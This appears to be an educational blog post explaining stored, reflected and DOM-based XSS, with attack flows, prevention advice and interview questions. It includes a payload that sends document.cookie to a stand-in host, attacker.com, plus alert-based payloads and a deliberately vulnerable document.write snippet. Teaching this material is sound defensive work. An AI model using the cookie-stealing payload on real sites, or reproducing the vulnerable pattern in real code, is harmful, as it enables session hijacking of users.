Advanced XSS (Cross-Site Scripting) Attacks Explained: Types, Flows, and Real-World Examples
Cross-Site Scripting (XSS) is one of the most common and dangerous web application security vulnerabilities. XSS attacks allow attackers to inject malicious JavaScript code into trusted websites, which then executes inside a victim’s browser.
This post provides a deep, structured, learner-focused explanation of advanced XSS attacks, including Stored XSS, Reflected XSS, and DOM-Based XSS, with step-by-step attack flows and examples.
What Is Cross-Site Scripting (XSS)?
Cross-Site Scripting (XSS) is a web security vulnerability in which an attacker injects malicious scripts into a web application. These scripts execute in the victim’s browser under the trust of a legitimate website.
XSS primarily affects:
- User session cookies
- Authentication tokens
- Personal and sensitive data
Why XSS Attacks Are Dangerous
- Attacker can hijack user sessions
- Steal cookies and credentials
- Deface websites
- Perform actions on behalf of victims
XSS attacks break the trust between users and web applications.
Types of XSS Attacks (Overview)
- Stored XSS (Persistent)
- Reflected XSS (Non-Persistent)
- DOM-Based XSS (Client-Side)
1️⃣ Stored XSS (Persistent XSS)
Stored XSS occurs when a malicious script is permanently stored on the target server, usually in a database.
Every time a victim accesses the affected page, the malicious script executes automatically.
Stored XSS Attack Flow (Based on Image)
- Attacker submits a malicious script (e.g., via comment form)
- The script is stored in the server database
- Victim requests the page
- Server returns the page containing the malicious script
- Script executes in victim’s browser and sends data to attacker
Example Stored XSS Payload
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>
Real-World Scenario
A forum comment section stores user input without validation. An attacker injects a script that steals session cookies from every visitor.
2️⃣ Reflected XSS (Non-Persistent XSS)
Reflected XSS occurs when malicious input is reflected immediately from the server to the victim’s browser without being stored.
This attack usually relies on social engineering to trick victims into clicking malicious links.
Reflected XSS Attack Flow (Based on Image)
- Attacker creates a malicious URL with embedded script
- Victim clicks the malicious link
- Request is sent to the vulnerable web server
- Server reflects the script back in the response
- Script executes in the victim’s browser
Example Reflected XSS URL
https://vulnerable-site.com/search?q=<script>alert('XSS')</script>
Real-World Scenario
A search page displays user input without encoding. An attacker sends a phishing email containing a malicious link.
3️⃣ DOM-Based XSS (Client-Side XSS)
DOM-Based XSS occurs when the vulnerability exists entirely in client-side JavaScript code, not on the server.
The payload is never sent to the server. Instead, it is processed by the browser’s DOM.
DOM-Based XSS Attack Flow (Based on Image)
- Attacker crafts a URL containing a malicious fragment
- Victim opens the link
- Browser loads a legitimate page from the server
- Client-side JavaScript processes the payload
- DOM is modified and malicious code executes
Example DOM-Based XSS Code
<script>
var name = window.location.hash.substring(1);
document.write("Hello " + name);
</script>
Example Attack URL
https://vulnerable-site.com/#<img src=x onerror=alert(1)>
Key Differences Between XSS Types
| Type | Stored on Server | Requires User Interaction | Location of Vulnerability |
|---|---|---|---|
| Stored XSS | Yes | No | Server-side |
| Reflected XSS | No | Yes | Server-side |
| DOM-Based XSS | No | Yes | Client-side (Browser) |
XSS in OSI & Web Context
- Occurs at Application Layer (OSI Layer 7)
- Targets browsers and client-side execution
How to Prevent XSS Attacks
Developer Best Practices
- Input validation and sanitization
- Output encoding
- Use Content Security Policy (CSP)
- Avoid unsafe DOM methods (innerHTML, document.write)
Security Controls
- HTTPOnly cookies
- Secure and SameSite cookie flags
- Web Application Firewalls (WAF)
Interview Questions on XSS
- What is Cross-Site Scripting?
- Difference between Stored, Reflected, and DOM XSS?
- Which XSS type is most dangerous and why?
- How can XSS be prevented?
Final Conclusion
XSS attacks exploit trust between users and web applications. Understanding advanced XSS types, their execution flow, and prevention techniques is essential for web developers, cybersecurity professionals, and ethical hackers.
Understand XSS deeply — to defend web applications effectively 🚀
